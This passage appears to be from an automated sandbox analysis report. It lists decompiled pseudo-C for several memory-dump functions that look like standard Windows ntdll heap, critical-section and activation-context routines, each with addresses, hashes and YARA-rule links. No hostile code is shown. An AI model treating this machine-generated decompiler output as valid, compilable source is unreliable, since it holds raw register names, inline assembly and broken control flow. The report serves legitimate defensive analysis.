				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x189d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E017C4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E017EB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E017E98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E017E95D0();
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                      0x017dd29c
                                                      0x017dd2a6
                                                      0x017dd2b1
                                                      0x017dd2b5
                                                      0x017dd2b6
                                                      0x017dd2bc
                                                      0x017dd2bd
                                                      0x017dd2be
                                                      0x017dd2bf
                                                      0x017dd2c2
                                                      0x017dd2c4
                                                      0x017dd2cc
                                                      0x017dd384
                                                      0x017dd34b
                                                      0x017dd34f
                                                      0x017dd350
                                                      0x017dd351
                                                      0x017dd35c
                                                      0x017dd35c
                                                      0x017dd2d6
                                                      0x017dd2da
                                                      0x017dd2e1
                                                      0x017dd361
                                                      0x017dd369
                                                      0x017dd36d
                                                      0x017dd2e3
                                                      0x017dd2e3
                                                      0x017dd2e3
                                                      0x017dd2e5
                                                      0x017dd2ed
                                                      0x017dd2f5
                                                      0x017dd2fa
                                                      0x017dd302
                                                      0x017dd303
                                                      0x017dd30b
                                                      0x017dd30f
                                                      0x017dd313
                                                      0x017dd318
                                                      0x017dd31c
                                                      0x017dd320
                                                      0x017dd379
                                                      0x017dd37d
                                                      0x00000000
                                                      0x00000000
                                                      0x0181affe
                                                      0x0181b001
                                                      0x0181b011
                                                      0x00000000
                                                      0x017dd322
                                                      0x017dd322
                                                      0x017dd330
                                                      0x017dd337
                                                      0x017dd35d
                                                      0x017dd339
                                                      0x017dd33f
                                                      0x017dd38c
                                                      0x017dd38c
                                                      0x017dd33f
                                                      0x017dd349
                                                      0x00000000
                                                      0x017dd349

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: c1dcc62d6337c57248563ae3acb777ea3408521d82d8b92b197b04e6e96c677e
                                                      • Instruction ID: 8889d0720fbd45151f6c55a0c3ac8631bd64ed1999f8798abd504b8b0f0bdde8
                                                      • Opcode Fuzzy Hash: c1dcc62d6337c57248563ae3acb777ea3408521d82d8b92b197b04e6e96c677e
                                                      • Instruction Fuzzy Hash: C23193B2508309DFC721DF68C98495BFBF8EB99754F40092EF99583290DA34DD04CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017B1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E017B1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E017EBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E017EA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E017EA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L017C4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                      0x017b1b8f
                                                      0x017b1b9a
                                                      0x017b1b9c
                                                      0x017b1b9e
                                                      0x017b1ba3
                                                      0x01807010
                                                      0x01807010
                                                      0x00000000
                                                      0x017b1ba9
                                                      0x017b1ba9
                                                      0x017b1bae
                                                      0x00000000
                                                      0x017b1bc5
                                                      0x017b1bca
                                                      0x017b1bcf
                                                      0x017b1bd0
                                                      0x017b1bd1
                                                      0x017b1bd2
                                                      0x017b1bd6
                                                      0x017b1bdc
                                                      0x017b1be0
                                                      0x01806ffc
                                                      0x01807000
                                                      0x00000000
                                                      0x01807006
                                                      0x01807009
                                                      0x01807009
                                                      0x017b1be6
                                                      0x017b1bec
                                                      0x017b1c0b
                                                      0x017b1c0b
                                                      0x017b1c0c
                                                      0x017b1c11
                                                      0x017b1c12
                                                      0x017b1c15
                                                      0x017b1c1b
                                                      0x017b1c1f
                                                      0x017b1c31
                                                      0x017b1c33
                                                      0x01807026
                                                      0x01807026
                                                      0x017b1c21
                                                      0x017b1c24
                                                      0x017b1c24
                                                      0x017b1bee
                                                      0x017b1bee
                                                      0x017b1bf2
                                                      0x017b1c3a
                                                      0x017b1bf4
                                                      0x017b1bf4
                                                      0x017b1c05
                                                      0x017b1c05
                                                      0x017b1c09
                                                      0x017b1c3e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017b1c09
                                                      0x017b1bec
                                                      0x017b1be0
                                                      0x017b1bae
                                                      0x017b1c2e

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: WindowsExcludedProcs
                                                      • API String ID: 0-3583428290
                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction ID: e6540ec97a217056d716bfd7644759fd354f0b692b6a0e81a69c006a977b184f
                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction Fuzzy Hash: 2A21F53A501229EBDB22DA59A894F9BFBADAF44B50F064465FA04DB204D730DD0097E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017CF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E017CF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                      0x017cf71d
                                                      0x017cf722
                                                      0x017cf726
                                                      0x01814770
                                                      0x017cf765
                                                      0x017cf769
                                                      0x017cf769
                                                      0x017cf732
                                                      0x0181477a
                                                      0x00000000
                                                      0x0181477a
                                                      0x017cf738
                                                      0x017cf73a
                                                      0x017cf73c
                                                      0x017cf73f
                                                      0x017cf746
                                                      0x017cf778
                                                      0x017cf7a9
                                                      0x017cf7a9
                                                      0x017cf754
                                                      0x017cf75a
                                                      0x017cf75d
                                                      0x017cf75f
                                                      0x017cf761
                                                      0x017cf76f
                                                      0x017cf771
                                                      0x017cf771
                                                      0x017cf76f
                                                      0x017cf763
                                                      0x00000000
                                                      0x017cf763
                                                      0x017cf77d
                                                      0x017cf7a3
                                                      0x017cf7a5
                                                      0x00000000
                                                      0x017cf7a5
                                                      0x017cf77f
                                                      0x017cf782
                                                      0x017cf784
                                                      0x017cf786
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017cf788
                                                      0x017cf748
                                                      0x017cf74d
                                                      0x017cf78d
                                                      0x017cf793
                                                      0x017cf7b7
                                                      0x017cf7bc
                                                      0x00000000
                                                      0x017cf7bc
                                                      0x017cf798
                                                      0x00000000
                                                      0x00000000
                                                      0x017cf79d
                                                      0x017cf7b0
                                                      0x00000000
                                                      0x017cf7b0
                                                      0x017cf79f
                                                      0x00000000
                                                      0x017cf74f
                                                      0x017cf74f
                                                      0x00000000
                                                      0x017cf74f

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: 4d737f819d85ed918fa636847063e6560b0e8a056d2b3ca4160f6307a6dbb73f
                                                      • Instruction ID: a10cd916f357f2f37276aca4c6398d5ab7d055f9061b7a2f99cb0181727621ee
                                                      • Opcode Fuzzy Hash: 4d737f819d85ed918fa636847063e6560b0e8a056d2b3ca4160f6307a6dbb73f
                                                      • Instruction Fuzzy Hash: D211B2353057028BEB254F1D8490736F69BEB95F24FB4457EE961CB791DB70C8418341
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01858DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E01858DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1880d50);
				E017FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01835720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L017FDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L017FDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E017FD130(_t34, _t39, _t40);
			}





                                                      0x01858df1
                                                      0x01858df1
                                                      0x01858df1
                                                      0x01858df1
                                                      0x01858df1
                                                      0x01858df1
                                                      0x01858df3
                                                      0x01858df8
                                                      0x01858dfd
                                                      0x01858e00
                                                      0x01858e0e
                                                      0x01858e2a
                                                      0x01858e36
                                                      0x01858e38
                                                      0x01858e3c
                                                      0x01858e46
                                                      0x01858e46
                                                      0x01858e36
                                                      0x01858e50
                                                      0x01858e56
                                                      0x01858e59
                                                      0x01858e5c
                                                      0x01858e60
                                                      0x01858e67
                                                      0x01858e6d
                                                      0x01858e73
                                                      0x01858e74
                                                      0x01858eb1
                                                      0x01858ebd

                                                      Strings
                                                      • Critical error detected %lx, xrefs: 01858E21
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Critical error detected %lx
                                                      • API String ID: 0-802127002
                                                      • Opcode ID: 5b0da801c428f974a7de65e1a4726a93a3ddfe196c843f10c0e3232e6c50509f
                                                      • Instruction ID: 7817ce54be792944f44e9d106fc13819fc474aa749d1465b12a9e690f57d83f4
                                                      • Opcode Fuzzy Hash: 5b0da801c428f974a7de65e1a4726a93a3ddfe196c843f10c0e3232e6c50509f
                                                      • Instruction Fuzzy Hash: 5F117975D04348DADF25DFA9C5057DDBBB0EB05314F20421ED529AB392C3340601DF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0183FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0183FF60
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                      • API String ID: 0-1911121157
                                                      • Opcode ID: 0915710a419bb21aae7d5aaa99b1567242af5ef8843c06bb3283ddba8ea9f9ca
                                                      • Instruction ID: 2ad6df9e4f6cf59a6a0a3bbb5f48893083052b9e0a53c43547440bd4bef61a54
                                                      • Opcode Fuzzy Hash: 0915710a419bb21aae7d5aaa99b1567242af5ef8843c06bb3283ddba8ea9f9ca
                                                      • Instruction Fuzzy Hash: 74110071910544EFDF22EB54C848F98BBB1FF48704F188058E609AB2A1CB389B44DBD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01875BA5, Relevance: .6, Instructions: 592COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E01875BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1881178);
				E017FD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01874C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E017ED000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01875542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x18960e8;
								if( *0x18960e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x18960e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E017E9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E017E6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E017EF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E017EF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E017EF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E017EFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
